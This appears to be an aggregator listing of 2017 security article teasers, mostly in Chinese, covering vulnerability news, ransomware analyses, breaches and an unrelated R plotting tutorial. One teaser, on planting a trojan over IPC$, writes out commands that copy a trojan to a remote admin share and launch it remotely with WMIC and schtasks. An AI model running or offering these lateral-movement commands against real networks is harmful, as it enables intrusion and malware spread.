Clik here to view.
R 学习 - 散点图
散点图 散点图在生物信息分析中是应用比较广的一个图,常见的差异基因火山图、功能富集分析泡泡图、相关性分析散点图、抖动图、PCA样品分类图等。凡是想展示分布状态的都可以用散点图。 横纵轴都为数字的散点图解析 绘制散点图的输入一般都是规规矩矩的矩阵,可以让不同的列分别代表X轴、Y轴、点的大小、颜色、形状、名称等。 输入数据格式 (使用火山图的输入数据为例) 火山图需要的数据格式如下 id:...
View ArticleClik here to view.
7月31日 - 每日安全知识热点
【知识】7月31日 - 每日安全知识热点 2017-07-31 10:35:14 阅读:205次 来源: 安全客 作者:童话 热点概要: 如何利用GitHub Enterprise的4个漏洞,从SSRF到远程代码执行、 sThisLegit、Phinn:新型开源钓鱼工具、 如何使用Burp Suite模糊测试SQL注入、XSS、命令执行漏洞、...
View ArticleClik here to view.
TechNet Augusta and DoDIIS Worldwide Moving Government Cybersecurity Forward
We will be at TechNet Augusta on August 7-11. Visit us at booth 112. We will be at DoDIIS Worldwide Conference on August 13-16 in St. Louis. Visit us at booth 739. Discover how application isolation...
View ArticleClik here to view.
悬镜安全实验室白帽子KrOiNg再次获得网易SRC月度贡献榜第一!
摘要: 悬镜-一站式“云+端”服务器防黑加固践行者 说到漏洞,你会想到什么? 程序的bug?软件的漏洞?系统的漏洞? 提到乌云,安全圈对这个名字再熟悉不过了,一个白帽子挖漏天堂,可惜的是现在网站已经关闭了。 现在白帽子们挖漏洞有两种方式。一种是直接提交给专门... 悬镜-一站式“云+端”服务器防黑加固践行者 说到漏洞,你会想到什么? 程序的bug?软件的漏洞?系统的漏洞?...
View ArticleClik here to view.
一个有20年历史的SMB漏洞:一台树莓派就能DoS大型服务器,微软表示不会修复该漏洞
绝大部分 DoS 攻击,一般来说都是目标系统收到大量服务请求,最终导致拒绝服务状态。实际上,随着技术的发展,如果要让现在的系统“拒绝服务”,是需要海量请求配合的――也就是所谓的泛洪攻击才能做到的,这就需要用到分布式拒绝服务,也就是 DDoS 攻击了。但在前不久结束的 DEF CON 大会上,安全研究人员在 windows SMB...
View ArticleClik here to view.
Pingback漏洞利用技术
0x00 废话 在做内部扫描的过程中,有些POC带有无回显识别功能时,漏洞扫描发payload的时候会把这个callback地址插入到HTTP报文的任意地方进行发送探测漏洞,时间久了,就发现回显后台中有很多 不知所云 的DNS或者HTTP的log,遇到这种情况并不好排查,往往不了了之。但现在这种情况深入分析是有存在漏洞的风险的,我姑且称其为Pingback漏洞。以下是BH2017相关议题的一些总结。...
View ArticleClik here to view.
HBO被盗1.5T数据究竟意味着什么?影响远超索尼黑客事件
Mashable中文站 8月3日报道 日前有部分媒体收到了一则匿名黑客邮件,邮件内容声称黑客已经窃取了HBO内部超过1.5TB的数据资料。根据黑客给出的“样品”内容来看,HBO的这些被盗数据中至少包括有一集还未播出的《权利的游戏》(Gameof Thrones)以及一名HBO高级制片人的私人信息。...
View ArticleClik here to view.
专访Killer:计算机病毒大多没有技术含量
引言 “十步杀一人,千里不留行;事了拂衣去,深藏功与名。”诗人李白笔下的侠客,武术超强,淡泊名利。想必,面对这些侠客的人,会不由自主的两股战战,心生寒气,但这些侠客,却也不是只顾私利,冷血残忍的杀手。...
View Article内网IPC$种马的三种方法
copy muma.exe //host/c$/windows/temp/foobar.exe ? ? ##IPC拷贝木马文件 WMIC远程运行命令 wmic /node:host /user:administrator /p 密码 process call create “c:/windows/temp/foobar.exe” schtasks计划任务远程运行 schtasks /create...
View ArticleClik here to view.
老款亚马逊Echo音箱存在安全漏洞 可以被黑客变成窃听器
腾讯科技讯 据外媒报道,信息安全公司MWR InfoSecurity的研发人员发现,老款 亚马逊 Echo智能音箱中存在一个安全漏洞,黑客可以利用它将Echo音箱变成窃听器,而又不影响它的整体功效。 但是,黑客必须要能够接触到实体的Echo音箱,并神不知鬼不觉地做一些手脚,然后才能远程控制它。...
View ArticleClik here to view.
渗透测试--01信息搜集
信息搜集是渗透目标的最重要的阶段,占据整个渗透测试的60%,可见信息搜集的重要性。根据收集的有用信息,可以大大提高我们渗透测试的成功率。 0x01 搜索引擎 Google、Bing、ZoomEye(钟馗之眼)、Shodan(撒旦) Google hacking intext: 把网页中的正文内容中的某个字符做为搜索条件; allintext:使用方法和intext类似; intitle:...
View ArticleClik here to view.
Facebook's New Security Feature Made Me Think Too Hard About Who My Real...
The biggest problem with most technological security features is the huge onus they place on the user to know what the hell they're doing. Facebook recently launched a security feature that spreads the...
View Article默安科技 CEO 聂万泉的野心,并不只是营收翻倍 500%
大公司内部创业是个鬼话,根本不可能的。一年前,云舒是这样说的。 当时,聂万泉、云舒、汪利辉三人从阿里离开,创办了默安科技。这三个人离开时,职位都不低,头上顶着的 title 分别是阿里安全部总监、资深安全专家、高级安全专家。据说,阿里云前期的的一些工作,至少聂万泉都是主要话事人。 回过头来说当初,他们为什么要走?默安科技这一年的发展对得起他们三人错过的精彩吗?...
View ArticleClik here to view.
Cyber criminals make it difficult to follow the money
Some security commentators have expressed surprise that the funds have been accessed because of the belief that it will provide a money trail to the cyber criminals responsible for the WannaCry...
View ArticleClik here to view.
Taking the FIRST look at Crypt0l0cker
This post is authored by Matthew Molyett . Executive Summary In March, Talos reported on the details ofCrypt0l0cker based on an extensive analysis I carried out on the sample binaries. Binaries --...
View ArticleClik here to view.
Android banking Trojan uses keylogger, exploits accessbility features to...
A banking Trojan for Android dubbed "Svpeng" recently saw an update, according to Kaspersky Lab , gaining functionality like a keylogger, and ability to exploit the operating system's accessibility...
View ArticleClik here to view.
Petya变种勒索蠕虫启动代码分析
背景 继5月的WannaCry勒索蠕虫事件以后,2017年6月又出现了Petya变种勒索蠕虫,除了利用永恒之蓝漏洞和加密勒索以后,Petya变种与WannaCry有比较大的差别。WannaCry会加密机器上的文件,导致数据损毁,而Petya更为激进,它会加密系统的MBR直接导致机器无法启动,本文对其执行的MBR及文件系统的加密机制做详细的分析。 恶意代码分析...
View ArticleMetInfo多处框架缺陷 一键Getshell
首先列举所有利用到的缺陷 全局参数可被污染 无CSRF防御框架 $_GET,$_POST, $_COOKIE请求被合并处理 特殊的XSS 框架分析(Metinfo漏洞):...
View ArticleClik here to view.
FBI arrests WannaCry hero for alleged role in Kronos banking malware
A malware researcherhailed as a hero earlier this year has been arrested by the FBI for his alleged role in distributing the banking malware known as Kronos. Marcus Hutchins, also known as...
View Article
